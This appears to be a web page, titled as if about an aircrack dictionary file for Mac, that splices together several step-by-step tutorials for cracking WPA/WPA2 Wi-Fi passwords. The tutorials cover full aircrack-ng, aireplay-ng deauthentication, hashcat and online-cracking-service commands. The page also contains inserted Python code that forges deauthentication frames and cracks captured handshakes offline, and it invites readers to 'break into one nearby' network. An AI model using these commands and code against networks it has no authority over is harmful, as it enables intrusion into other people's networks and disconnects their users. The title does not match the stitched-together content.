
Dictionary Txt For Aircrack For Mac



Jul 27, 2018. aircrack-ng accepts several wordlists in one run, separated by commas: aircrack-ng -w firstlist.txt,secondlist.txt,thirdlist.txt wpa2.eapol.cap. Aircrack-ng also ships with a small dictionary called password.lst, located in the 'test' directory of the source tree.

This is a brief walk-through that illustrates how to crack Wi-Fi networks secured with weak passwords. It is not exhaustive, but it should be enough information for you to test your own network's security or break into one nearby.

The capture part of the attack outlined below is passive: your card only listens, so nothing is transmitted and there is nothing for the target to detect, provided that you don't actually use the password you crack. The optional deauthentication step that speeds up capturing the handshake is active. It is visible to any wireless IDS that counts deauthentication frames, and it does not work at all against networks where the AP and client negotiate 802.11w protected management frames, because forged deauthentication frames are then rejected.

DISCLAIMER: This method is for educational purposes only. It should not be used for illegal activity. The author is not responsible for its use.

Requirements:

  1. A Kali Linux machine (2017.1 preferably)
  2. A USB Wi-Fi Adapter which supports monitor mode.
  3. Have aircrack-ng utility installed.

If aircrack-ng is not installed on your Linux machine, you can install it with the command below:

sudo apt-get install aircrack-ng

The first step is to identify your wireless adapter by typing 'iwconfig' in your terminal.

Here you can see that wlan0 is your wireless interface: it supports 802.11, ESSID is off, and the mode is Managed.

The second step is to use airmon-ng (part of the aircrack-ng suite) to put your wireless card into monitor mode. In monitor mode the card is not associated with any network and receives every 802.11 frame on its channel, including management frames such as beacons, deauthentications and the EAPOL handshake frames we want. This is different from the promiscuous mode of a wired or associated interface, which only sees frames of the network it is attached to.

Here 'ng' means Next Generation: aircrack-ng replaced the older aircrack suite, which is no longer maintained.

To start monitor mode, type 'airmon-ng start wlan0', which turns wlan0 into wlan0mon. If NetworkManager or wpa_supplicant keep resetting the card back to managed mode, run 'airmon-ng check kill' first to stop the interfering processes.

The next tool is airodump-ng, which captures the packets we specify. Start listening to the 802.11 beacon frames broadcast by nearby wireless routers on your monitor interface by typing 'airodump-ng wlan0mon' in the same terminal.

You should see output similar to the screen above.

For the purposes of this practical, we will crack the password of our own network, 'Chetan Soni'. Note the BSSID (MAC address) and channel (CH) number as displayed by airodump-ng, as we will need both in the following steps.

So Our BSSID address is C4:F0:81:A1:0C:99 and Channel No is 11.

As we can see in the screenshot above, airodump-ng displays all of the APs (access points) within range with their BSSID (MAC address), their power, the number of beacon frames, the number of data packets, the channel, the speed, the encryption method, the type of cipher used, the authentication method used, and finally, the ESSID.

The next step is to capture a 4-way handshake, because WPA/WPA2 uses a 4-way handshake to authenticate devices to the network. The handshake does not carry the password itself: it carries the nonces exchanged by the AP and the client plus a MIC computed from a key derived from the passphrase and the ESSID. That is enough to test candidate passphrases offline, so you have to capture one of these handshakes in order to crack the network password.

These handshakes occur whenever a device connects to the network, for instance, when your neighbor returns home from work.

To capture the 4-way handshake, type 'airodump-ng -c 11 --bssid C4:F0:81:A1:0C:99 -w yeahhub wlan0mon' in your terminal.

Here -c stands for channel, --bssid is the MAC address of the target AP and -w writes the captured packets to a file with the given prefix.

You should see output similar to the screen above. In the top right corner there is no 'WPA handshake' yet, so to get the handshake quickly we'll use the deauthentication method: we send forged deauthentication packets to the target client, which forces it to reconnect.

To deauthenticate the target, type 'aireplay-ng -0 2 -a C4:F0:81:A1:0C:99 -c 84:10:0D:9E:A1:CD wlan0mon' in another terminal.

Aireplay-ng is another powerful tool in our aircrack-ng arsenal, and it can be used to generate or accelerate traffic on the AP. This can be especially useful in attacks like a deauth attack that bumps everyone off the access point, WEP and WPA2 password attacks, as well as ARP injection and replay attacks.

Here -0 selects the deauthentication attack (the number after it is how many rounds to send), -a is the BSSID of the target AP and -c is the MAC address of the client station.

A deauth attack sends forged deauthentication packets from your machine to a client connected to the network you are trying to crack. These packets carry a fake 'sender' address that makes them appear to the client as if they were sent by the access point itself; aireplay-ng also sends the mirror image, a deauthentication addressed to the AP with the client's address as sender. Deauthentication is a management frame, and in WPA2 networks without 802.11w it is neither encrypted nor authenticated, which is why the forgery works.

Upon receipt of such packets, most clients disconnect from the network and immediately reconnect, providing you with a 4-way handshake as shown below.

You can optionally broadcast deauth packets to all connected clients by omitting -c: 'aireplay-ng -0 2 -a C4:F0:81:A1:0C:99 wlan0mon'.
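The following is an added example, not code from the original tutorial or from aireplay-ng, that builds the forged deauthentication frames described above by hand and shows the counting rule a wireless IDS uses to notice them. The frames are constructed in memory and never transmitted; the AP and station MACs are the ones from the walk-through, the 64-frames-per-round figure mirrors what aireplay-ng reports, and the function names and the flood threshold are assumptions made for the illustration.

```python
"""Forged 802.11 deauthentication frames (what `aireplay-ng -0` sends) and a
simple flood detector. Added illustration only; frames are built in memory."""
import struct
from collections import Counter

FC_DEAUTH = 0x00C0       # frame control: type 0 (management), subtype 12 (deauthentication)
REASON_CLASS3 = 7        # "class 3 frame received from nonassociated STA", the reason aireplay-ng uses
FRAMES_PER_ROUND = 64    # aireplay-ng sends 64 directed deauths per round, in each direction


def mac(text):
    """'C4:F0:81:A1:0C:99' -> 6 raw bytes."""
    return bytes.fromhex(text.replace(":", ""))


def deauth_frame(dst, src, bssid, reason=REASON_CLASS3, seq=0):
    """24-byte management header followed by a 2-byte reason code.
    Without 802.11w there is no MIC on this frame, so any radio can forge it."""
    header = (struct.pack("<HH", FC_DEAUTH, 0)       # frame control, duration
              + dst + src + bssid                      # addr1 (receiver), addr2 (sender), addr3 (BSSID)
              + struct.pack("<H", seq << 4))           # sequence control (fragment 0)
    return header + struct.pack("<H", reason)


def parse_frame(frame):
    """Decode the fields a detector needs: type/subtype, addresses, reason (for deauths)."""
    fc, = struct.unpack_from("<H", frame, 0)
    info = {"type": (fc >> 2) & 0x3, "subtype": (fc >> 4) & 0xF,
            "dst": frame[4:10], "src": frame[10:16], "bssid": frame[16:22]}
    if info["type"] == 0 and info["subtype"] == 12:
        info["reason"], = struct.unpack_from("<H", frame, 24)
    return info


def deauth_round(ap, sta):
    """One round of `aireplay-ng -0 1 -a AP -c STA`: frames to the client that claim to come
    from the AP, and frames to the AP that claim to come from the client."""
    to_client = [deauth_frame(sta, ap, ap, seq=i) for i in range(FRAMES_PER_ROUND)]
    to_ap = [deauth_frame(ap, sta, ap, seq=i) for i in range(FRAMES_PER_ROUND)]
    return to_client + to_ap


def deauth_broadcast(ap):
    """`aireplay-ng -0 1 -a AP` with no -c: one frame to ff:ff:ff:ff:ff:ff kicks every client."""
    return deauth_frame(b"\xff" * 6, ap, ap)


def flag_deauth_flood(frames, threshold):
    """Wireless-IDS style rule: report BSSIDs that appear on more than `threshold`
    deauthentication frames in the captured window. A real AP sends a handful at most."""
    counts = Counter()
    for frame in frames:
        info = parse_frame(frame)
        if info["type"] == 0 and info["subtype"] == 12:
            counts[info["bssid"]] += 1
    return {bssid for bssid, n in counts.items() if n > threshold}


# Addresses from the walk-through above.
AP = mac("C4:F0:81:A1:0C:99")
STA = mac("84:10:0D:9E:A1:CD")

if __name__ == "__main__":
    burst = deauth_round(AP, STA) + deauth_round(AP, STA)   # `aireplay-ng -0 2 ...`
    print(len(burst), "frames;", "flooding BSSIDs:",
          [b.hex(":") for b in flag_deauth_flood(burst, 10)])
```

The detector only counts frames, which is exactly how commercial wireless IDS sensors flag aireplay-ng: 128 deauthentications from one BSSID within a second is not something a legitimate AP does.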

So here airodump-ng reports 'WPA handshake: C4:F0:81:A1:0C:99' in its top right corner, meaning it captured the handshake for our target BSSID.

Once you've captured a handshake, press CTRL +C to quit airodump-ng. You should see a .cap file wherever you told airodump-ng to save the capture (likely called yeahhub-01.cap). We will use this capture file to crack the network password.

Now the final step is to crack the password using the captured handshake. If you have access to a GPU, we highly recommend using hashcat for password cracking.

Method 1 – GPUHASH.me

You can also use the website Gpuhash.me: simply upload your .cap file by clicking on Add new task. Keep in mind that with this and the other online services you are handing the handshake, the BSSID and the ESSID of the network to a third party.

In 2nd step, click on Next

Now select the Basic WPA search package and fill out your email address and then click on SEND.

At the end you'll get a task ID with which you can monitor whether the password has been cracked or not.

Method 2 – OnlineHashCrack


You can also upload your .cap file to the OnlineHashCrack website along with your email address and submit it. The maximum .cap file size accepted there is 20 MB.

Method 3 – Naive-Hashcat

Before cracking the password with naive-hashcat, we need to convert our .cap to the hashcat file format .hccapx. You can do this easily either by uploading the .cap file to https://hashcat.net/cap2hccapx/ or by using the cap2hccapx tool directly. Note that newer hashcat releases deprecate .hccapx and hash mode 2500 in favour of hash mode 22000 (WPA-PBKDF2-PMKID+EAPOL), whose input is produced by hcxpcapngtool.

You can also use hashc.co.uk website to convert the .cap file into .hccapx file.

You can also use hashcat-utils, an open-source collection of small helper programs from the hashcat project, which you can download from GitHub by typing 'git clone https://github.com/hashcat/hashcat-utils.git'.

After downloading hashcat-utils, go into its src directory and type 'make' to compile the tools.

Now run the following command to convert the .cap file into .hccapx format using hashcat.

Command: ./cap2hccapx.bin <.cap file path>

Now copy the .hccapx file to root's home directory, because the naive-hashcat script below is run from there.

Now to install naive-hashcat package, type 'git clone https://github.com/brannondorsey/naive-hashcat'.

Download the dictionary file by typing 'curl -L -o dicts/rockyou.txt https://github.com/brannondorsey/naive-hashcat/releases/download/data/rockyou.txt'.

Now type 'HASH_FILE=../yeahhub.hccapx POT_FILE=yeahhub.pot HASH_TYPE=2500 ./naive-hashcat.sh'.

Naive-hashcat runs a series of dictionary, rule, combination and mask (smart brute-force) attacks, and it can take days or even months against mid-strength passwords. The cracked password is saved to yeahhub.pot, so check this file periodically. Once the password is cracked, the pot file will contain a line like the one below (MIC, AP MAC, station MAC, ESSID and the password, separated by colons).

e30a5a57fc00211fc9f57a4491508cc3:9c5c8ec9abc0:acd1b8dfd971:Chetan Soni:hackitnow

Aircrack-ng can be used for basic dictionary attacks running on your CPU. Before you run the attack you need a word list; copy the same dictionary file into root's home directory next to the capture.

Note that if the network password is not in the word list you will not crack the password: this is an offline dictionary attack, not a brute force of the key itself.

To crack the password using aircrack-ng, type 'aircrack-ng -a2 -b C4:F0:81:A1:0C:99 -w dictionary.txt yeahhub-01.cap'. Here -a2 selects WPA/WPA2-PSK mode, -b restricts the attack to our target BSSID and -w names the word list (a comma-separated list of files is also accepted).

If the password is cracked you will see a KEY FOUND! message in the terminal followed by the plain text version of the network password as shown below:
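The block below is an added example, not code from the original tutorial, aircrack-ng or hashcat. It implements the offline check that both tools perform on a captured handshake, and also the pre-flight test a practitioner wants before burning CPU or GPU time: does the capture actually contain an ANonce/SNonce pair? It is restricted to WPA2 (key descriptor version 2, HMAC-SHA1 MIC, PBKDF2-SHA1 PMK) and to the first four EAPOL-Key frames; the handshake it cracks is constructed in memory by a simulated supplicant using the ESSID, MACs and password from this walk-through, the RSN IE bytes are a typical CCMP element, and the small word list and the function names are assumptions made for the illustration. The PMK test vector (passphrase 'password', SSID 'IEEE') is the one published in the IEEE 802.11 standard.

```python
"""Offline WPA2-PSK dictionary attack against a 4-way handshake, as aircrack-ng
and hashcat do it. Added illustration; the handshake below is constructed."""
import hashlib
import hmac

KEYINFO_OFF = 5    # EAPOL header (4) + descriptor type (1)
NONCE_OFF = 17     # ... + key info (2), key length (2), replay counter (8)
MIC_OFF = 81       # ... + nonce (32), key IV (16), key RSC (8), key ID (8)


def pmk_from_passphrase(passphrase, ssid):
    """PMK = PBKDF2-HMAC-SHA1(passphrase, ssid, 4096 iterations, 32 bytes). This is the
    expensive step that makes the attack slow, and the reason a GPU helps."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def ptk_from_pmk(pmk, ap, sta, anonce, snonce):
    """PRF-512 of the PMK over both MACs and both nonces, exactly as both sides compute it."""
    data = min(ap, sta) + max(ap, sta) + min(anonce, snonce) + max(anonce, snonce)
    out = b""
    for i in range(4):
        out += hmac.new(pmk, b"Pairwise key expansion\x00" + data + bytes([i]), hashlib.sha1).digest()
    return out[:64]   # KCK = first 16 bytes, KEK = next 16, TK = rest


def eapol_mic(kck, frame):
    """MIC over the EAPOL-Key frame with its MIC field zeroed (WPA2: HMAC-SHA1 truncated to 16)."""
    zeroed = frame[:MIC_OFF] + bytes(16) + frame[MIC_OFF + 16:]
    return hmac.new(kck, zeroed, hashlib.sha1).digest()[:16]


def build_eapol_key(key_info, replay, nonce, key_data=b"", mic=bytes(16)):
    """Serialise an EAPOL-Key frame (802.1X version 2, packet type 3, descriptor type 2)."""
    body = (bytes([2]) + key_info.to_bytes(2, "big") + (16).to_bytes(2, "big")
            + replay.to_bytes(8, "big") + nonce + bytes(16) + bytes(8) + bytes(8)
            + mic + len(key_data).to_bytes(2, "big") + key_data)
    return bytes([2, 3]) + len(body).to_bytes(2, "big") + body


def classify(frame):
    """Which handshake message is this? Decided from the Key Information flag bits."""
    ki = int.from_bytes(frame[KEYINFO_OFF:KEYINFO_OFF + 2], "big")
    ack, mic, install, secure = ki & 0x80, ki & 0x100, ki & 0x40, ki & 0x200
    if ack and not mic:
        return "M1"
    if ack and mic and install:
        return "M3"
    if mic and not ack and not secure:
        return "M2"
    if mic and not ack and secure:
        return "M4"
    return None


def supplicant_m2(passphrase, ssid, ap, sta, anonce, snonce, rsn_ie):
    """The client's side of the exchange: answer M1 with M2, MIC'd under the real passphrase."""
    kck = ptk_from_pmk(pmk_from_passphrase(passphrase, ssid), ap, sta, anonce, snonce)[:16]
    frame = build_eapol_key(0x010A, 1, snonce, rsn_ie)
    return frame[:MIC_OFF] + eapol_mic(kck, frame) + frame[MIC_OFF + 16:]


def crack(ssid, ap, sta, frames, wordlist):
    """Return the passphrase from `wordlist` whose derived KCK reproduces the MIC of M2,
    or None. Raises ValueError if the capture holds no usable handshake."""
    kinds = {classify(f): f for f in frames}
    if "M2" not in kinds or not ("M1" in kinds or "M3" in kinds):
        raise ValueError("no ANonce/SNonce pair in capture: nothing to crack")
    anonce = (kinds.get("M1") or kinds["M3"])[NONCE_OFF:NONCE_OFF + 32]
    m2 = kinds["M2"]
    snonce, target = m2[NONCE_OFF:NONCE_OFF + 32], m2[MIC_OFF:MIC_OFF + 16]
    for candidate in wordlist:
        if not 8 <= len(candidate) <= 63:     # WPA passphrases are 8 to 63 characters
            continue
        kck = ptk_from_pmk(pmk_from_passphrase(candidate, ssid), ap, sta, anonce, snonce)[:16]
        if hmac.compare_digest(eapol_mic(kck, m2), target):
            return candidate
    return None


# Constructed handshake using the names from the walk-through (not a real capture).
SSID = "Chetan Soni"
AP = bytes.fromhex("C4F081A10C99")
STA = bytes.fromhex("84100D9EA1CD")
ANONCE, SNONCE = bytes(range(32)), bytes(range(32, 64))
RSN_IE = bytes.fromhex("30140100000fac040100000fac040100000fac020000")   # typical CCMP RSN element
M1 = build_eapol_key(0x008A, 1, ANONCE)
M2 = supplicant_m2("hackitnow", SSID, AP, STA, ANONCE, SNONCE, RSN_IE)
WORDLIST = ["123456", "password", "letmein1", "hackitnow", "Password1"]   # constructed sample list

if __name__ == "__main__":
    print("KEY FOUND!", crack(SSID, AP, STA, [M1, M2], WORDLIST))
```

Two things the code makes concrete that the tutorial only states: the capture needs the ANonce (from M1 or M3) together with the SNonce and MIC (from M2), which is why airodump-ng waits for a full exchange before printing 'WPA handshake'; and every candidate costs 4096 HMAC-SHA1 rounds for the PMK plus four more for the PTK, which is the cost a GPU parallelises.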

Yippee, we got the key! Much of the information presented here was gleaned from GitHub. Thanks also to the awesome authors and maintainers who work on Aircrack-ng and Hashcat.

Aircrack-ng is a whole suite of tools for wireless security auditing. It can be used to monitor, test, crack or attack wireless security protocols like WEP, WPA and WPA2. Aircrack-ng is command-line based and is available for Windows, macOS and other Unix-based operating systems. The suite contains many tools for various purposes, but here we'll only look at the important ones that are used most often in wireless security testing.

Airmon-ng

Airmon-ng is used to manage wireless card modes and to kill unnecessary processes while using aircrack-ng. To sniff a wireless connection, you need to change your wireless card from managed mode to monitor mode and airmon-ng is used for that purpose.

Airodump-ng

Airodump-ng is a wireless sniffer that can capture wireless data from one or more wireless Access Points. It is used to analyze nearby Access Points and to capture handshakes.

Aireplay-ng

Aireplay-ng is used for replay attacks and as a packet injector. It can deauthenticate users from their APs to capture handshakes.

Airdecap-ng

Airdecap-ng is used to decrypt captured WEP or WPA/WPA2 wireless packets once the key is known.

Aircrack-ng

Aircrack-ng is used to attack WPA/WEP wireless protocols in order to find the key.

Aircrack-ng is easy to install in Ubuntu using APT. Just type the following commands and this will install all the tools of the Aircrack-ng suite.

sudo apt-get update
sudo apt-get install -y aircrack-ng

Usage

In this article, we'll take a quick look at how to use aircrack-ng to crack an encrypted wireless network (TR1CKST3R in this example) to find the password.

First of all, list out all available wireless cards connected to your PC using ‘iwconfig' command.

We'll use the wireless card named 'wlxc83a35cb4546' for this tutorial (this might be different in your case). Now kill all the processes that would interfere with the wireless card using airmon-ng:

ubuntu@ubuntu:~$ sudo airmon-ng check kill

Start monitor mode on 'wlxc83a35cb4546' by typing:

ubuntu@ubuntu:~$ sudo airmon-ng start wlxc83a35cb4546

Now that airmon-ng has started monitor mode on the wireless card, it will appear under a different name, 'wlan0mon'. Run 'iwconfig' again to list the wireless details.

Then, use airodump-ng to see nearby Wireless Access Points and their properties.

You can narrow down the search using the MAC (--bssid) and channel (-c) filters. To capture the handshake (which contains the nonces and MIC from which the passphrase can be checked offline, not the password itself), we need to save our packets somewhere using the '--write' option. Type:

ubuntu@ubuntu:~$ sudo airodump-ng --bssid 6C:B7:49:FC:62:E4 -c 11 wlan0mon --write /tmp/handshake.cap

--bssid : Access Point's MAC address
-c : Access Point's channel [1-13]
--write : Prefix for the capture files; airodump-ng appends -01.cap and so on

Now we need to deauthenticate every device from this Access Point using the aireplay-ng utility. Type:

ubuntu@ubuntu:~$ sudo aireplay-ng -0 100 -a [MAC_ADD] wlan0mon

-0 : Deauthentication attack; the number that follows is how many rounds of deauth packets to send (0 means keep sending)

-a : Specify the Access Point's MAC for aireplay-ng


After a while, all devices will be disconnected from that Access Point. When they try to reconnect, the running airodump-ng will capture the handshake. It will appear at the top of the airodump-ng output.

The handshake is stored in the '/tmp/' directory. It does not contain the password, but it contains enough material (nonces and MIC) to test candidate passphrases offline against a dictionary. To crack the password we'll be using aircrack-ng. Type:

ubuntu@ubuntu:~$ sudo aircrack-ng /tmp/handshake.cap-01.cap -w /usr/share/wordlists/rockyou.txt

-w : Specify the dictionary location

Aircrack-ng will go through the list of passwords and, if one matches, will display it as the key.

In this case aircrack-ng found the password in use: '123456789'.

Now stop monitor mode on the wireless card and restart NetworkManager.

ubuntu@ubuntu:~$ sudo airmon-ng stop wlan0mon
ubuntu@ubuntu:~$ sudo service network-manager restart


Conclusion


Aircrack-ng can be used to audit wireless security or to recover forgotten passwords. There are other similar tools available for this purpose, like Kismet, but aircrack-ng is better known for its good support, versatility and wide range of tools. It has an easy-to-use command-line interface that can be automated from any scripting language, such as Python.
